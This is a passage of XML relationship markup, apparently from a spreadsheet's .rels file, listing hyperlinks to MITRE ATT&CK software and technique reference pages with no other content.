Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0260" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0433" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0516" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0164" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0191" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0042" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0198" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0122" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0177" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0230" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0204" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0554" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0192" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0342" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0526" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0185" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0004" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0532" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0508" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0404" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0473" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0454" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0569" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0220" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0376" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0112" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0559" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0221" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0066" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0576" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0219" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0360" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0365" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0097" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0108" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0492" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0355" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0431" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0511" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0140" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0585" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0080" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0534" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0216" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0430" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0350" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0025" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0502" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0049" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0581" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0441" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0400" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0374" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0146" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0334" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0395" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0266" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0205" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0587" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0330" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0082" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0132" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0269" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0028" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0077" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0356" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0031" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0500" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0359" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0022" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0008" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0114" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0267" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0070" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0148" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0020" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0578" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0469" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0455" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0264" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0491" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0579" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0385" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0381" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0124" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0332" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0268" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0046" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0398" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0444"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attack.mitre.org/techniques/T1555/002" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/002" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/003" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/005" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/001" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/002" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1046" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/003" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1611" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1572" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/001" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/006" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1123" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/001" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/003" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/014" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/003" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1531" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/001" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/004" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/006" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/010" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/005" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/002" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/003" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/004" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1485" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/008" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/002" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/001" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/001" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/003" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/005" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/002" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1528" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/006" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/004" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1612" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/001" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/001" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/002" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/002" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/002" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/004" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/001" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/001" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1490" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/001" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/004" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/004" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/004" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/002" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127/001" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/002" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/006" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/001" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/002" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/007" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/004" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/007" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/002" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/001" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1535" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/001" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/002" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1482" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1120" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/001" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/002" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1072" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/002" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/004" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/010" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/004" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/002" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590" TargetMode="External"/><Relationship 